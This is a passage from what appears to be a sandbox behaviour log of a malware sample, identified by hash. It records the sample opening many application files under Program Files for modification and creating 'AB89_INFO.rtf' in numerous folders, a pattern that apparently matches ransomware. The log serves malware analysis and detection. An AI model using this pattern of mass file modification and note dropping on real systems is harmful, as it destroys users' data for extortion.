Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\tesselate.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Maldives 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ja.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Paris 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\VisualElements\VisualElements_70.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tbilisi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Maputo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Regina 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ro.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\startNetworkServer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroSign.prc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\SmallLogo.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\Genko_1.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-search_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Bucharest 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\EST5EDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Adak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\plugin.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\HST 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-explorer_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Araguaina 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateHelper.msi 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.artifact.repository.prefs 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pyongyang 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Seoul 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\hr.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\bin\servertool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cairo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\title.htm 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\Australia\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240389.profile.gz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\North_Dakota\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\zipfs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Minsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_es.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Tripoli 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Gambier 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kamchatka 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nipigon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\idlj.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\core.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Mozilla Firefox\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychart.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\keytool.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sampler_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Synchronization.rll 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker_1.1.200.v20131119-0908.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chatham 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Taipei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.policy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-javahelp_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for 